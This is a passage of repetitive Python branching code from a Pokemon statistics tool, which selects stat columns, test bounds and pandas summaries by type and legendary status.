stat_stats = loaddata.non_legendary_flying_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_flying_types['height_m']
stat_stats = loaddata.non_legendary_flying_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_flying_types['weight_kg']
stat_stats = loaddata.non_legendary_flying_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# poison pokemon
elif type_set == "13":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_poison_types['total_points']
stat_stats = loaddata.non_legendary_poison_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['hp']
stat_stats = loaddata.non_legendary_poison_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['speed']
stat_stats = loaddata.non_legendary_poison_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['attack']
stat_stats = loaddata.non_legendary_poison_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['defense']
stat_stats = loaddata.non_legendary_poison_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['sp_attack']
stat_stats = loaddata.non_legendary_poison_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_poison_types['sp_defense']
stat_stats = loaddata.non_legendary_poison_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_poison_types['height_m']
stat_stats = loaddata.non_legendary_poison_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_poison_types['weight_kg']
stat_stats = loaddata.non_legendary_poison_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ground pokemon
elif type_set == "14":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_ground_types['total_points']
stat_stats = loaddata.non_legendary_ground_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['hp']
stat_stats = loaddata.non_legendary_ground_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['speed']
stat_stats = loaddata.non_legendary_ground_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['attack']
stat_stats = loaddata.non_legendary_ground_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['defense']
stat_stats = loaddata.non_legendary_ground_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['sp_attack']
stat_stats = loaddata.non_legendary_ground_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ground_types['sp_defense']
stat_stats = loaddata.non_legendary_ground_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_ground_types['height_m']
stat_stats = loaddata.non_legendary_ground_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_ground_types['weight_kg']
stat_stats = loaddata.non_legendary_ground_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# rock pokemon
elif type_set == "15":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_rock_types['total_points']
stat_stats = loaddata.non_legendary_rock_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['hp']
stat_stats = loaddata.non_legendary_rock_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['speed']
stat_stats = loaddata.non_legendary_rock_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['attack']
stat_stats = loaddata.non_legendary_rock_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['defense']
stat_stats = loaddata.non_legendary_rock_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['sp_attack']
stat_stats = loaddata.non_legendary_rock_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_rock_types['sp_defense']
stat_stats = loaddata.non_legendary_rock_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_rock_types['height_m']
stat_stats = loaddata.non_legendary_rock_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_rock_types['weight_kg']
stat_stats = loaddata.non_legendary_rock_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# bug pokemon
elif type_set == "16":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_bug_types['total_points']
stat_stats = loaddata.non_legendary_bug_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['hp']
stat_stats = loaddata.non_legendary_bug_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['speed']
stat_stats = loaddata.non_legendary_bug_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['attack']
stat_stats = loaddata.non_legendary_bug_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['defense']
stat_stats = loaddata.non_legendary_bug_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['sp_attack']
stat_stats = loaddata.non_legendary_bug_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_bug_types['sp_defense']
stat_stats = loaddata.non_legendary_bug_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_bug_types['height_m']
stat_stats = loaddata.non_legendary_bug_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_bug_types['weight_kg']
stat_stats = loaddata.non_legendary_bug_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ghost pokemon
elif type_set == "17":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_ghost_types['total_points']
stat_stats = loaddata.non_legendary_ghost_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['hp']
stat_stats = loaddata.non_legendary_ghost_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['speed']
stat_stats = loaddata.non_legendary_ghost_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['attack']
stat_stats = loaddata.non_legendary_ghost_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['defense']
stat_stats = loaddata.non_legendary_ghost_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['sp_attack']
stat_stats = loaddata.non_legendary_ghost_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ghost_types['sp_defense']
stat_stats = loaddata.non_legendary_ghost_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_ghost_types['height_m']
stat_stats = loaddata.non_legendary_ghost_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_ghost_types['weight_kg']
stat_stats = loaddata.non_legendary_ghost_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# steel pokemon
elif type_set == "18":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_steel_types['total_points']
stat_stats = loaddata.non_legendary_steel_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['hp']
stat_stats = loaddata.non_legendary_steel_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['speed']
stat_stats = loaddata.non_legendary_steel_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['attack']
stat_stats = loaddata.non_legendary_steel_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['defense']
stat_stats = loaddata.non_legendary_steel_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['sp_attack']
stat_stats = loaddata.non_legendary_steel_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_steel_types['sp_defense']
stat_stats = loaddata.non_legendary_steel_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_steel_types['height_m']
stat_stats = loaddata.non_legendary_steel_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_steel_types['weight_kg']
stat_stats = loaddata.non_legendary_steel_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# all pokemon (trimmed h & w)
elif type_set == "19":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_total_points
stat_stats = loaddata.non_legendary_total_points_stats
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_hp
stat_stats = loaddata.non_legendary_hp_stats
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_speed
stat_stats = loaddata.non_legendary_speed_stats
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_attack
stat_stats = loaddata.non_legendary_attack_stats
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_defense
stat_stats = loaddata.non_legendary_defense_stats
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_sp_attack
stat_stats = loaddata.non_legendary_sp_attack_stats
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_sp_defense
stat_stats = loaddata.non_legendary_sp_defense_stats
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_height
stat_stats = loaddata.non_legendary_height_stats
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_weight
stat_stats = loaddata.non_legendary_weight_stats
unit = '(kg)'
else:
return
else:
return
elif data_set == "4": # legendary pokemon
set_name = "Legendary Pokemon"
modifier = '(legendary)'
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_grass_types['total_points']
stat_stats = loaddata.legendary_grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['hp']
stat_stats = loaddata.legendary_grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['speed']
stat_stats = loaddata.legendary_grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['attack']
stat_stats = loaddata.legendary_grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['defense']
stat_stats = loaddata.legendary_grass_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['sp_attack']
stat_stats = loaddata.legendary_grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_grass_types['sp_defense']
stat_stats = loaddata.legendary_grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_grass_types['height_m']
stat_stats = loaddata.legendary_grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_grass_types['weight_kg']
stat_stats = loaddata.legendary_grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_fire_types['total_points']
stat_stats = loaddata.legendary_fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['hp']
stat_stats = loaddata.legendary_fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['speed']
stat_stats = loaddata.legendary_fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['attack']
stat_stats = loaddata.legendary_fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['defense']
stat_stats = loaddata.legendary_fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['sp_attack']
stat_stats = loaddata.legendary_fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fire_types['sp_defense']
stat_stats = loaddata.legendary_fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_fire_types['height_m']
stat_stats = loaddata.legendary_fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_fire_types['weight_kg']
stat_stats = loaddata.legendary_fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_water_types['total_points']
stat_stats = loaddata.legendary_water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['hp']
stat_stats = loaddata.legendary_water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['speed']
stat_stats = loaddata.legendary_water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['attack']
stat_stats = loaddata.legendary_water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['defense']
stat_stats = loaddata.legendary_water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['sp_attack']
stat_stats = loaddata.legendary_water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_water_types['sp_defense']
stat_stats = loaddata.legendary_water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_water_types['height_m']
stat_stats = loaddata.legendary_water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_water_types['weight_kg']
stat_stats = loaddata.legendary_water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_electric_types['total_points']
stat_stats = loaddata.legendary_electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['hp']
stat_stats = loaddata.legendary_electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['speed']
stat_stats = loaddata.legendary_electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['attack']
stat_stats = loaddata.legendary_electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['defense']
stat_stats = loaddata.legendary_electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['sp_attack']
stat_stats = loaddata.legendary_electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_electric_types['sp_defense']
stat_stats = loaddata.legendary_electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_electric_types['height_m']
stat_stats = loaddata.legendary_electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_electric_types['weight_kg']
stat_stats = loaddata.legendary_electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_psychic_types['total_points']
stat_stats = loaddata.legendary_psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['hp']
stat_stats = loaddata.legendary_psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['speed']
stat_stats = loaddata.legendary_psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['attack']
stat_stats = loaddata.legendary_psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['defense']
stat_stats = loaddata.legendary_psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['sp_attack']
stat_stats = loaddata.legendary_psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_psychic_types['sp_defense']
stat_stats = loaddata.legendary_psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_psychic_types['height_m']
stat_stats = loaddata.legendary_psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_psychic_types['weight_kg']
stat_stats = loaddata.legendary_psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_ice_types['total_points']
stat_stats = loaddata.legendary_ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['hp']
stat_stats = loaddata.legendary_ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['speed']
stat_stats = loaddata.legendary_ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['attack']
stat_stats = loaddata.legendary_ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['defense']
stat_stats = loaddata.legendary_ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['sp_attack']
stat_stats = loaddata.legendary_ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['sp_defense']
stat_stats = loaddata.legendary_ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_ice_types['height_m']
stat_stats = loaddata.legendary_ice_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_ice_types['weight_kg']
stat_stats = loaddata.legendary_ice_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dragon pokemon
elif type_set == "7":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_dragon_types['total_points']
stat_stats = loaddata.legendary_dragon_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['hp']
stat_stats = loaddata.legendary_dragon_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['speed']
stat_stats = loaddata.legendary_dragon_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['attack']
stat_stats = loaddata.legendary_dragon_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['defense']
stat_stats = loaddata.legendary_dragon_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['sp_attack']
stat_stats = loaddata.legendary_dragon_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['sp_defense']
stat_stats = loaddata.legendary_dragon_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_dragon_types['height_m']
stat_stats = loaddata.legendary_dragon_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_dragon_types['weight_kg']
stat_stats = loaddata.legendary_dragon_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dark pokemon
elif type_set == "8":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_dark_types['total_points']
stat_stats = loaddata.legendary_dark_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['hp']
stat_stats = loaddata.legendary_dark_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['speed']
stat_stats = loaddata.legendary_dark_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['attack']
stat_stats = loaddata.legendary_dark_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['defense']
stat_stats = loaddata.legendary_dark_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['sp_attack']
stat_stats = loaddata.legendary_dark_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['sp_defense']
stat_stats = loaddata.legendary_dark_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_dark_types['height_m']
stat_stats = loaddata.legendary_dark_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_dark_types['weight_kg']
stat_stats = loaddata.legendary_dark_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fairy pokemon
elif type_set == "9":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_fairy_types['total_points']
stat_stats = loaddata.legendary_fairy_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['hp']
stat_stats = loaddata.legendary_fairy_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['speed']
stat_stats = loaddata.legendary_fairy_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['attack']
stat_stats = loaddata.legendary_fairy_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['defense']
stat_stats = loaddata.legendary_fairy_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['sp_attack']
stat_stats = loaddata.legendary_fairy_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
